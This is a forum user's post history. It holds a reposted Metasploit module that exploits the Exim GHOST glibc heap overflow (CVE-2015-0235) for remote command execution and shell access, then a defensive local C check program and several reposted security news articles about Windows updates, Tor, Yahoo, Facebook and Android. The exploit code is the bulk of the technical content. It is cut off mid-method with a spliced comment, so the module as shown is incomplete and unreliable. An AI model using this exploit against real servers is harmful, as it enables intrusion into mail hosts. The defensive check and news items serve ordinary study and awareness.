Aerosol

Everything posted by Aerosol

  1. @askwrite yeah man, you're right, but he could have marked it as a duplicate from the start.
  2. ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit4 < Msf::Exploit::Remote
       Rank = GreatRanking

       include Msf::Exploit::Remote::Tcp

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',
           'Description'    => %q(
             This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based
             buffer overflow in the GNU C Library's gethostbyname functions) on x86
             and x86_64 GNU/Linux systems that run the Exim mail server.

             Technical information about the exploitation can be found in the
             original GHOST advisory, and in the source code of this module.

             ------------------------------------------------------------------------
             SERVER-SIDE REQUIREMENTS (Exim)
             ------------------------------------------------------------------------

             The remote system must use a vulnerable version of the GNU C Library:
             the first exploitable version is glibc-2.6, the last exploitable
             version is glibc-2.17; older versions might be exploitable too, but
             this module depends on the newer versions' fd_nextsize (a member of
             the malloc_chunk structure) to remotely obtain the address of Exim's
             smtp_cmd_buffer in the heap.

             ------------------------------------------------------------------------

             The remote system must run the Exim mail server: the first exploitable
             version is exim-4.77; older versions might be exploitable too, but this
             module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably
             set up the heap as described in the GHOST advisory.

             ------------------------------------------------------------------------

             The remote Exim mail server must be configured to perform extra security
             checks against its SMTP clients: either the helo_try_verify_hosts or the
             helo_verify_hosts option must be enabled; the "verify = helo" ACL might
             be exploitable too, but is unpredictable and therefore not supported by
             this module.

             ------------------------------------------------------------------------
             CLIENT-SIDE REQUIREMENTS (Metasploit)
             ------------------------------------------------------------------------

             This module's "exploit" method requires the SENDER_HOST_ADDRESS option to
             be set to the IPv4 address of the SMTP client (Metasploit), as seen by
             the SMTP server (Exim); additionally, this IPv4 address must have both
             forward and reverse DNS entries that match each other
             (Forward-Confirmed reverse DNS).

             ------------------------------------------------------------------------

             The remote Exim server might be exploitable even if the Metasploit
             client has no FCrDNS, but this module depends on Exim's sender_host_name
             variable to be set in order to reliably control the state of the remote
             heap.

             ------------------------------------------------------------------------
             TROUBLESHOOTING
             ------------------------------------------------------------------------

             "bad SENDER_HOST_ADDRESS (nil)" failure: the SENDER_HOST_ADDRESS option
             was not specified.

             ------------------------------------------------------------------------

             "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)" failure:
             the SENDER_HOST_ADDRESS option was specified, but not in IPv4
             dotted-decimal notation.

             ------------------------------------------------------------------------

             "bad SENDER_HOST_ADDRESS (helo_verify_hosts)" or
             "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)" failure: the
             SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP
             client (Metasploit), as seen by the SMTP server (Exim).

             ------------------------------------------------------------------------

             "bad SENDER_HOST_ADDRESS (no FCrDNS)" failure: the IPv4 address of the
             SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.

             ------------------------------------------------------------------------

             "not vuln? old glibc? (no leaked_arch)" failure: the remote Exim server
             is either not vulnerable, or not exploitable (glibc versions older than
             glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).

             ------------------------------------------------------------------------

             "NUL, CR, LF in addr? (no leaked_addr)" failure: Exim's heap address
             contains bad characters (NUL, CR, LF) and was therefore mangled during
             the information leak; this exploit is able to reconstruct most of these
             addresses, but not all (worst-case probability is ~1/85, but could be
             further improved).

             ------------------------------------------------------------------------

             "Brute-force SUCCESS" followed by a nil reply, but no shell: the remote
             Unix command was executed, but spawned a bind-shell or a reverse-shell
             that failed to connect (maybe because of a firewall, or a NAT, etc).

             ------------------------------------------------------------------------

             "Brute-force SUCCESS" followed by a non-nil reply, and no shell: the
             remote Unix command was executed, but failed to spawn the shell (maybe
             because the setsid command doesn't exist, or awk isn't gawk, or netcat
             doesn't support the -6 or -e option, or telnet doesn't support the -z
             option, etc).

             ------------------------------------------------------------------------

             Comments and questions are welcome!
           ),
           'Author'         => ['Qualys, Inc. <qsa[at]qualys.com>'],
           'License'        => BSD_LICENSE,
           'References'     => [
             ['CVE', '2015-0235'],
             ['US-CERT-VU', '967332'],
             ['OSVDB', '117579'],
             ['BID', '72325'],
             ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']
           ],
           'DisclosureDate' => 'Jan 27 2015',
           'Privileged'     => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)
           'Platform'       => 'unix', # actually 'linux', but we execute a unix-command payload
           'Arch'           => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^
           'Payload'        => {
             'Space'         => 255, # the shorter the payload, the higher the probability of code execution
             'BadChars'      => "", # we encode the payload ourselves, because ^
             'DisableNops'   => true,
             'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell
           },
           'Targets'        => [['Automatic', {}]],
           'DefaultTarget'  => 0
         ))
         register_options([
           Opt::RPORT(25),
           OptAddress.new('SENDER_HOST_ADDRESS', [false, 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])
         ], self.class)
         register_advanced_options([
           OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])
         ], self.class)
       end

       def check
         # for now, no information about the vulnerable state of the target
         check_code = Exploit::CheckCode::Unknown
         begin
           # not exploiting, just checking
           smtp_connect(false)
           # malloc()ate gethostbyname's buffer, and
           # make sure its next_chunk isn't the top chunk
           9.times do
             smtp_send("HELO ", "", "0", "", "", 1024+16-1+0)
             smtp_recv(HELO_CODES)
           end
           # overflow (4 bytes) gethostbyname's buffer, and
           # overwrite its next_chunk's size field with 0x00303030
           smtp_send("HELO ", "", "0", "", "", 1024+16-1+4)
           # from now on, an exception means vulnerable
           check_code = Exploit::CheckCode::Vulnerable
           # raise an exception if no valid SMTP reply
           reply = smtp_recv(ANY_CODE)
           # can't determine vulnerable state if smtp_verify_helo() isn't called
           return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/
           # realloc()ate gethostbyname's buffer, and
           # crash (old glibc) or abort (new glibc)
           # on the overwritten size field
           smtp_send("HELO ", "", "0", "", "", 2048-16-1+4)
           # raise an exception if no valid SMTP reply
           reply = smtp_recv(ANY_CODE)
           # can't determine vulnerable state if smtp_verify_helo() isn't called
           return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/
           # a vulnerable target should've crashed by now
           check_code = Exploit::CheckCode::Safe
         rescue
           peer = "#{rhost}:#{rport}"
           vprint_debug("#{peer} - Caught #{$!.class}: #{$!.message}")
         ensure
           smtp_disconnect
         end
         return check_code
       end

       def exploit
         unless datastore['I_KNOW_WHAT_I_AM_DOING']
           print_status("Checking if target is vulnerable...")
           fail_with("exploit", "Vulnerability check failed.") if check != Exploit::CheckCode::Vulnerable
           print_good("Target is vulnerable.")
         end
         information_leak
         code_execution
       end

       private

       HELO_CODES = '250|451|550'
       ANY_CODE = '[0-9]{3}'
       MIN_HEAP_SHIFT = 80
       MIN_HEAP_SIZE = 128 * 1024
       MAX_HEAP_SIZE = 1024 * 1024

       # Exim
       ALIGNMENT = 8
       STORE_BLOCK_SIZE = 8192
       STOREPOOL_MIN_SIZE = 256
       LOG_BUFFER_SIZE = 8192
       BIG_BUFFER_SIZE = 16384
       SMTP_CMD_BUFFER_SIZE = 16384
       IN_BUFFER_SIZE = 8192

       # GNU C Library
       PREV_INUSE = 0x1
       NS_MAXDNAME = 1025

       # Linux
       MMAP_MIN_ADDR = 65536

       def information_leak
         print_status("Trying information leak...")
         leaked_arch = nil
         leaked_addr = []
         # try different heap_shift values, in case Exim's heap address contains
         # bad chars (NUL, CR, LF) and was mangled during the information leak;
         # we'll keep the longest one (the least likely to have been truncated)
         16.times do
           done = catch(:another_heap_shift) do
             heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)
             print_debug("#{{ heap_shift: heap_shift }}")
             # write the malloc_chunk header at increasing offsets (8-byte step),
             # until we overwrite the "503 sender not yet given" error message
             128.step(256, 8) do |write_offset|
               error = try_information_leak(heap_shift, write_offset)
               print_debug("#{{ write_offset: write_offset, error: error }}")
               throw(:another_heap_shift) if not error
               next if error == "503 sender not yet given"
               # try a few more offsets (allows us to double-check things,
               # and distinguish between 32-bit and 64-bit machines)
               error = [error]
               1.upto(5) do |i|
                 error[i] = try_information_leak(heap_shift, write_offset + i*8)
                 throw(:another_heap_shift) if not error[i]
               end
               print_debug("#{{ error: error }}")
               _leaked_arch = leaked_arch
               if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize
                  (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd
                  (error[4] =~ /\A503 send[^e].?\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size
                  (error[5] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing()
                 leaked_arch = ARCH_X86_64
               elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize
                     (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd
                     (error[2] =~ /\A503 [^s].?\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size
                     (error[3] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing()
                 leaked_arch = ARCH_X86
               else
                 throw(:another_heap_shift)
               end
               print_debug("#{{ leaked_arch: leaked_arch }}")
               fail_with("infoleak", "arch changed") if _leaked_arch and _leaked_arch != leaked_arch
               # try different large-bins: most of them should be empty,
               # so keep the most frequent fd_nextsize address
               # (a pointer to the malloc_chunk itself)
               count = Hash.new(0)
               0.upto(9) do |last_digit|
                 error = try_information_leak(heap_shift, write_offset, last_digit)
                 next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes
                 next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK
                 count[error] += 1
               end
               print_debug("#{{ count: count }}")
               throw(:another_heap_shift) if count.empty?
               # convert count to a nested array of [key, value] arrays and sort it
               error_count = count.sort { |a, b| b[1] <=> a[1] }
               error_count = error_count.first # most frequent
               error = error_count[0]
               count = error_count[1]
               throw(:another_heap_shift) unless count >= 6 # majority
               leaked_addr.push({ error: error, shift: heap_shift })
               # common-case shortcut
               if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == "er not yet given") or
                  (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count("\x7E-\x7F").nonzero?)
                 leaked_addr = [leaked_addr.last] # use this one, and not another
                 throw(:another_heap_shift, true) # done
               end
               throw(:another_heap_shift)
             end
             throw(:another_heap_shift)
           end
           break if done
         end
         fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil?
         fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty?
         leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }
         leaked_addr = leaked_addr.first # longest
         error = leaked_addr[:error]
         shift = leaked_addr[:shift]
         leaked_addr = 0
         (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|
           break if i >= error.length
           leaked_addr += error.unpack('C*')[i] * (2**(i*8))
         end
         # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:
         leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE
         fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR
         print_good("Successfully leaked_arch: #{leaked_arch}")
         print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}")
         @leaked = { arch: leaked_arch, addr: leaked_addr }
       end

       def try_information_leak(heap_shift, write_offset, last_digit = 9)
         fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT)
         fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0
         fail_with("infoleak", "write_offset") if (write_offset & 7) != 0
         fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/
         smtp_connect
         # bulletproof Heap Feng Shui; the hard part is avoiding:
         # "Too many syntax or protocol errors" (3)
         # "Too many unrecognized commands" (3)
         # "Too many nonmail commands" (10)
         smtp_send("HELO ", "", "0", @sender
         # (the post is truncated here: the rest of this method, the
         #  code_execution methods and the start of smtp_connect are not
         #  included in the post)
         # avoid a future pathological case by forcing it now:
         # "Do NOT free the first successor, if our current block has less than 256 bytes left."
         smtp_send("MAIL FROM:", "<", method(:rand_text_alpha), ">", "", STOREPOOL_MIN_SIZE + 16)
         smtp_recv(501, 'sender address must contain a domain')
         smtp_send("RSET")
         smtp_recv(250, 'Reset OK')
       end

       def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)
         fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send
         @smtp_state = :sending
         if not arg_pattern
           fail_with("smtp_send", "prefix is nil") if not prefix
           fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length
           command = prefix
         else
           fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length
           length = arg_length - arg_prefix.length - arg_suffix.length
           fail_with("smtp_send", "len is #{length}") if length <= 0
           argument = arg_prefix
           case arg_pattern
           when String
             argument += arg_pattern * (length / arg_pattern.length)
             argument += arg_pattern[0, length % arg_pattern.length]
           when Method
             argument += arg_pattern.call(length)
           end
           argument += arg_suffix
           fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length
           command = prefix + argument + suffix
         end
         fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0
         fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE
         command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer
         # the following loop works around a bug in the put() method:
         # "while (send_idx < send_len)" should be "while (send_idx < buf.length)"
         # (or send_idx and/or send_len could be removed altogether, like here)
         while command and not command.empty?
           num_sent = sock.put(command)
           fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0
           fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length
           command = command[num_sent..-1]
         end
         @smtp_state = :recv
       end

       def smtp_recv(expected_code = nil, expected_data = nil)
         fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv
         @smtp_state = :recving
         failure = catch(:failure) do
           # parse SMTP replies very carefully (the information
           # leak injects arbitrary data into multiline replies)
           data = ""
           while data !~ /(\A|\r\n)[0-9]{3}[ ].*\r\n\z/mn
             begin
               more_data = sock.get_once
             rescue
               throw(:failure, "Caught #{$!.class}: #{$!.message}")
             end
             throw(:failure, "no more data") if more_data.nil?
             throw(:failure, "no more data") if more_data.empty?
             data += more_data
           end
           throw(:failure, "malformed reply (count)") if data.count("\0") > 0
           lines = data.scan(/(?:\A|\r\n)[0-9]{3}[ -].*?(?=\r\n(?=[0-9]{3}[ -]|\z))/mn)
           throw(:failure, "malformed reply (empty)") if lines.empty?
           code = nil
           lines.size.times do |i|
             lines[i].sub!(/\A\r\n/mn, "")
             lines[i] += "\r\n"
             if i == 0
               code = lines[i][0,3]
               throw(:failure, "bad code") if code !~ /\A[0-9]{3}\z/mn
               if expected_code and code !~ /\A(#{expected_code})\z/mn
                 throw(:failure, "unexpected #{code}, expected #{expected_code}")
               end
             end
             line_begins_with = lines[i][0,4]
             line_should_begin_with = code + (i == lines.size-1 ? " " : "-")
             if line_begins_with != line_should_begin_with
               throw(:failure, "line begins with #{line_begins_with}, " \
                               "should begin with #{line_should_begin_with}")
             end
           end
           throw(:failure, "malformed reply (join)") if lines.join("") != data
           if expected_data and data !~ /#{expected_data}/mn
             throw(:failure, "unexpected data")
           end
           reply = { code: code, lines: lines }
           @smtp_state = :send
           return reply
         end
         fail_with("smtp_recv", "#{failure}") if expected_code
         return nil
       end

       def smtp_disconnect
         disconnect if sock
         fail_with("smtp_disconnect", "sock isn't nil") if sock
         @smtp_state = :disconnected
       end
     end

     Source
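     The module above checks a remote Exim server by overflowing gethostbyname's buffer over SMTP. For a defender the more useful question is whether a host's own glibc is affected at all, which can be answered locally without any network traffic. The following C program is an added example, not part of the original post or of the Qualys module; it follows the canary-after-buffer approach described in the Qualys GHOST advisory: a fixed-size buffer is handed to gethostbyname_r() together with an all-digit name whose length exactly fills the size a vulnerable glibc miscalculates, and a canary placed right after the buffer reveals whether the call wrote past it. The function names ghost_probe() and ghost_name_len() and the result enum are assumptions of this example; a Linux host with glibc is assumed (on other libcs the check reports "indeterminate").

     ```c
     /* Added example (not the original post's or Qualys' code): a host-local
      * vulnerability check for CVE-2015-0235 (GHOST), after the advisory's
      * canary-after-buffer method. Assumes Linux + glibc. */
     #define _GNU_SOURCE
     #include <errno.h>
     #include <netdb.h>
     #include <stdio.h>
     #include <string.h>

     #define CANARY "in_the_coal_mine"

     enum ghost_result {
         GHOST_NOT_VULNERABLE = 0,   /* fixed glibc returned ERANGE, canary intact */
         GHOST_VULNERABLE     = 1,   /* the resolver wrote past the buffer */
         GHOST_INDETERMINATE  = 2    /* some other libc / unexpected code path */
     };

     /* Resolver buffer immediately followed by a canary, so any overflow of
      * the buffer lands in the canary instead of unrelated memory. */
     static struct {
         char buffer[1024];
         char canary[sizeof(CANARY)];
     } temp;

     /* Name length that exactly fills what vulnerable glibc thought it needed:
      * buflen - sizeof(struct in6_addr) (16) - 2 * sizeof(char *) - 1.
      * The bug was that the real writes exceed this by sizeof(char *) bytes
      * (the h_alias_ptr the size calculation forgot), hence the canary. */
     size_t ghost_name_len(void) {
         return sizeof(temp.buffer) - 16 * sizeof(unsigned char) - 2 * sizeof(char *) - 1;
     }

     enum ghost_result ghost_probe(void) {
         struct hostent resbuf;
         struct hostent *result = NULL;
         int herrno = 0;
         int retval;
         char name[sizeof(temp.buffer)];
         size_t len = ghost_name_len();

         memset(&temp, 0, sizeof(temp));
         strcpy(temp.buffer, "buffer");
         strcpy(temp.canary, CANARY);

         /* An all-digit name is handled by glibc's numeric fast path
          * (the code that had the bug), so no DNS query is ever sent. */
         memset(name, '0', len);
         name[len] = '\0';

         retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                                  &result, &herrno);

         if (strcmp(temp.canary, CANARY) != 0)
             return GHOST_VULNERABLE;       /* overflow reached the canary */
         if (retval == ERANGE)
             return GHOST_NOT_VULNERABLE;   /* fixed glibc refuses the too-small buffer */
         return GHOST_INDETERMINATE;
     }

     int main(void) {
         static const char *const names[] = { "not vulnerable", "vulnerable", "indeterminate" };
         enum ghost_result r = ghost_probe();
         printf("GHOST (CVE-2015-0235) local check: %s\n", names[r]);
         return r == GHOST_VULNERABLE;
     }
     ```

     Compile with `cc ghost_check.c -o ghost_check` and run it on each mail host; a non-zero exit status flags a libc that still needs the vendor glibc update (after which every long-running process that uses the resolver, Exim included, must be restarted to pick up the fixed library).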
  3. Does downloading Windows updates from Microsoft's servers and waiting too long really annoy you? It might not with the arrival of Windows 10. Microsoft seems to be making a major change in Windows 10 to the way it delivers updates for the software. The leaked version of Windows 10 build 10036 (the current version is build 9926) allows you to grab OS updates from Microsoft as well as from other computers, whether they're on your local network or on the Internet. Yeah, it's a Peer-to-Peer (P2P) technology Microsoft is going to use in order to deliver both app and operating system updates. Peer-to-Peer, or P2P, technology is usually associated with file sharing services like BitTorrent, used to download illicit copies of movies and albums, and of course, those endless Linux ISOs you've been downloading. However, Redmond is embracing the technology as an efficient means to deliver software updates to its users around the globe. Peer-to-Peer downloads will be optional in Windows 10. The new dialog box titled "Choose how you download updates" offers Windows users an option to "Download apps and OS updates from multiple sources to get them more quickly". Once turned ON, the option gives you the choice of:
     • Download apps and OS updates from Microsoft and PCs on my local network
     • Download apps and OS updates from Microsoft, PCs on my local network, and PCs on the Internet
     Besides accelerating the upgrade process, the P2P feature could save precious bandwidth if you have multiple PCs in your house. Redmond's move is not at all surprising, as the software maker bought Pando Networks in 2013, the maker of a peer-to-peer file sharing technology similar to BitTorrent. So far, the leaked screenshot has not been confirmed by the company, nor has it released any official announcement, but you can expect a new official Windows 10 preview release shortly that will likely include the new changes. However, if Microsoft really includes P2P technology for updating its software, it will be an interesting option for enabling distributed updates, rather than updating through Windows Server Update Services. Home users might appreciate the faster downloads that will come with peer-to-peer downloads.
     Source
  4. Are you aware of everything that your users are accessing from your environment? While most of the time non-work-related Internet browsing is harmless (looking at pictures of cats, online shopping, social media, etc.), there are some instances where you could be an unknowing and unwilling participant in criminal activity. That is, when users hide that activity via the Tor network, or the Dark Net. The Onion Router, better known as "Tor", an open source project launched in 2002, is designed to allow a user to browse the Internet anonymously via a volunteer network of more than 5000 relays. It doesn't share your identifying information, like your IP address and physical location, with websites or service providers. For a user that navigates the Internet using Tor, it's quite difficult to trace their activities, ensuring their online privacy. There are arguably legitimate uses for this technology, such as providing Internet access in repressively regulated countries. Tor has been a favorite target of intelligence agencies. The NSA targeted Tor users using a zero-day vulnerability in the Firefox browser bundled with Tor, which allowed them to get the real IP address of anonymous Tor users. Using the same techniques, the FBI was also able to track the owner of 'Freedom Hosting', the biggest service provider for sites on the encrypted Tor network, which hosted many child pornography sites. However, Mozilla then fixed that Firefox flaw exploited by government law enforcement officials. Moreover, Tor is often associated with illicit activity (child pornography, selling controlled substances, identity theft, money laundering, and so on). Most admins will want to prohibit their users from using the Tor network due to its association with nefarious activity. Since the point of origin is nearly impossible to determine with conventional means, many bad actors leverage the Tor network to hide the location of Command & Control servers, machines taking ransomware payments, etc. This makes identifying them and their malware that much harder. Users browsing the Tor network (for illicit purposes or not) from your environment can open you up to hosting malicious/illegal content, Ransomware infection, or unknowingly participating in other malicious activity. Therefore it is also known as DeepNet or Deep Web. To know more about the Deep Web you can read our detailed article, "What is the Deep Web? A first trip into the abyss".
     WHAT CAN I DO ABOUT TOR?
     AlienVault Unified Security ManagementTM (USM) can help. USM provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team. The correlation directives and IDS signatures in AlienVault Unified Security Management (USM) can detect when a system is attempting to resolve a Tor domain, and allow you to take corrective action. Plus, new & updated correlation directives developed by the experts at AlienVault Labs are pushed to USM weekly, enabling detection of emerging threats. Learn more about AlienVault USM:
     • Download a free 30-day trial
     • Watch a demo on-demand
     • Play with USM in our product sandbox (no download required)
     Source
  5. Yahoo! has offered $24,000 to a security researcher for finding out and reporting three critical security vulnerabilities in its products, including Yahoo! Stores and Yahoo!-hosted websites. While testing all of the company's applications, Mark Litchfield, a bug bounty hunter who often works with different companies, discovered three critical vulnerabilities in Yahoo!'s products. All three vulnerabilities have now been fixed by Yahoo!.
     THREE CRITICAL SECURITY VULNERABILITIES
     The first and most critical vulnerability gives hackers full administrator access to Yahoo!'s e-commerce platform, Yahoo! Small Business, a portal that allows small business owners to create their own web stores through Yahoo! and sell merchandise. According to the researcher, the flaw in the service allowed him to fully administer any Yahoo store and thereby gain access to customers' personally identifiable information, including names, email addresses and telephone numbers.
     BUG ALLOWS FREE SHOPPING
     Besides allowing hackers full admin access to the web stores, the vulnerability could also allow an attacker to rig a user-run eCommerce web store to let them shop for free, or at a huge discount, Litchfield claimed. A separate but related vulnerability in Yahoo! Stores, the second flaw discovered by Litchfield, allows an unauthorized user to edit Yahoo-hosted stores through the app, thereby creating a means for hackers to hijack an online web store. Last but not least, Litchfield discovered a critical vulnerability in Yahoo's Small Business portal that allows hackers to seize administrative access to Yahoo!-hosted websites and gain full, unauthorized access to them. The Internet giant patched all three bugs two weeks ago after Litchfield publicly released details and proof of concepts for the exploits on Bug Bounty HQ, a community website for bug bounties established by Litchfield last month for fellow hunters to share their findings.
     'ON DEMAND PASSWORD'
     At a recent SXSW session, Yahoo! launched 'on-demand passwords,' which it says will eliminate the need for you to ever remember your email password. Whenever you need it, the company will send you an OTP (one time password) via SMS to your mobile phone. It's sort of two-factor authentication—without the first factor involved, as there is no need for the user to enter any log-in password. In order to opt in for the feature, follow some simple steps:
     • Sign in to your Yahoo email account.
     • Click on your name at the top right corner to access your account information page.
     • Choose Security in the sidebar.
     • Click on the slider for on-demand passwords, in order to opt in.
     • Enter your phone number and Yahoo will send you a verification code.
     • Enter the code.
     Now, the next time you sign in to your email account, Yahoo will send a password via SMS to your phone when you need it. Also, the end-to-end email encryption that Yahoo! promised will be available by the end of this year. The company gave its first demonstration of the locked-down messaging system at the SXSW session, and it is also delivering early source code for security researchers to analyze.
     Source
  6. Facebook today reported a slight drop in government requests for user data, bucking a trend that peaked during the first half of 2014 with the highest numbers the company had seen. Its latest transparency report covers the second half of last year, and shows slight dips in requests for user data, the number of accounts referenced and the percentage of requests where Facebook turned over some data. The numbers are still high, however, and demonstrate a continued interest on the part of the government to use data from web-based services in criminal and national security cases. Despite dips in requests in the United States—and Germany—Facebook said overall requests for user account data were up slightly from its last report, as was the number of government requests for data and content restrictions. In the U.S., for example, Facebook received 14,274 requests for user data affecting 21,731 accounts; Facebook said it complied with 79 percent of those requests, turning over some content or user data. Content restriction requests, meanwhile, were almost exclusively dominated by India and Ukraine. By comparison, Facebook, through the first six months of 2014, fielded 15,433 requests for user data affecting 23,667 accounts; in 80 percent of those occasions, Facebook turned over some data. “We publish this information because we want people to know the extent and nature of the requests we receive from governments and the policies we have in place to process them,” said Monika Bickert, head of Facebook global policy management, and Chris Sonderby, Deputy General Counsel. “Moving forward, we will continue to scrutinize each government request and push back when we find deficiencies. We will also continue to push governments around the world to reform their surveillance practices in a way that maintains the safety and security of their people while ensuring their rights and freedoms are protected.” Facebook also provided some insight into its Community Standards, which define what content is acceptable to post on the social network. Bickert and Sonderby said there are occasions, for example, when Facebook is asked to remove or restrict access to content because it violates local law, even though it may be within the bounds of its standards. Those numbers are also included in today’s report, along with more detail and examples of what constitutes Facebook’s Community Standards. “We challenge requests that appear to be unreasonable or overbroad,” Bickert and Sonderby said. “And if a country requests that we remove content because it is illegal in that country, we will not necessarily remove it from Facebook entirely, but may restrict access to it in the country where it is illegal.”
     Source
  7. Following up on a promise it made during last summer’s Black Hat, Yahoo on Sunday said it’s on track to deliver end-to-end encryption for its email users this year. And to that end, it released the early source code for the Yahoo encryption browser extension to GitHub. Chief information security officer Alex Stamos made the announcement at the South by Southwest Festival, where he said he hopes the security community will pore over the code and submit any vulnerabilities to Yahoo’s Bug Bounty program. He also said that he hopes other email providers will build compatible solutions. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo also released a video, below, demonstrating the ease with which its encryption is deployed compared to GPG, a free and open source encryption implementation. Stamos hopes the solution, which he called “intuitive”, will be available by the end of the year. “Anybody who has the ability to write an email should have no problem using our email encryption,” he said to AFP. Yahoo has made huge strides with its efforts to encrypt its web-based services beyond email, turning on HTTPS by default in January 2014 and, four months later, encrypting traffic sent between its data centers. This was a weak spot known to be exploited by the National Security Agency, which was copying data from Yahoo and Google’s fiber-optic cables outside the United States. Last August during Black Hat, Stamos announced that Yahoo had partnered with Google on its efforts to encrypt email end to end in a fashion that would be transparent to users. Stamos said Yahoo would use the browser extension Google released in June that enables end-to-end encryption of all data leaving the browser. Stamos said at the time that Yahoo was working to ensure that its system works well with Google’s so that encrypted communications between Yahoo Mail and Gmail users will be simple. “I think anybody who uses email in the center of our life needs encryption,” Stamos said to AFP. “If you send emails to your spouse or your lawyer or family members, you want to have these messages be confidential.” Yahoo is also carrying over that same type of simplicity and intuitiveness to authentication. In addition, on Sunday it also announced a plan to ease the pain associated with passwords with the introduction of on-demand passwords. Director of product management Chris Stoner said in making the announcement that Yahoo users would no longer need to remember complex passwords to access their Yahoo accounts. Instead, once a user opts in to the on-demand password service, a verification code will be sent to the user’s mobile device that can be used to access their account. “It’s important for our products to be safe as used by normal people,” said Stamos. “Our users face a very diverse set of threats. The biggest threat is probably someone stealing their password, and their account being taken over.” This article was corrected, correcting references of a plug-in to a browser extension.
     Source
  8. Google is prepping a fix for Android users that addresses a meddlesome memory leakage issue that’s plagued some device users since the end of last year. The issue, present in versions 5.0.1 and 5.1 of the mobile operating system code-named Lollipop, has been causing irregular application activity on several Nexus devices for weeks. In some instances, users have apparently experienced issues launching apps and seen apps randomly restarting, often without opening or changing any application. The most prevalent issue users have witnessed has been a massive surge in memory usage. On an issue tracker for the bug on Android’s Open Source Project (AOSP) late last week some users reported seeing their RAM bloat to over 1 gigabyte and leave as little as 150 megabytes free, before their phones ultimately crashed. Users claim they’ve seen their phone’s system memory swell, usually after opening a game, then dismissing it. Even if apps are closed however, the phone will go on to gobble up memory until there’s no more space and the device stops responding. The issue – mostly seen in Nexus 5 devices – has lingered since December 2014, when Google pushed 5.0.1 to Nexus devices, but resurfaced in 5.1, which was rolled out last week. “Memory leak not fixed,” one user wrote on AOSP last week, “I’ve had system RAM bloated over 1GB, processes restarting and launcher redraws.” The issue was closed at Android’s Issue Tracker on Friday when a Google project member acknowledged the issue had been “fixed internally,” but added that the company did not have a timetable for public release. The bug’s status was also changed from “New” to “FutureRelease” on Friday, suggesting a fix is forthcoming, perhaps in 5.1.1, but emails to Google inquiring exactly when that fix would come were not immediately replied to on Monday. Android’s security team has been busy over the past several months addressing issues that have popped up in Lollipop. 
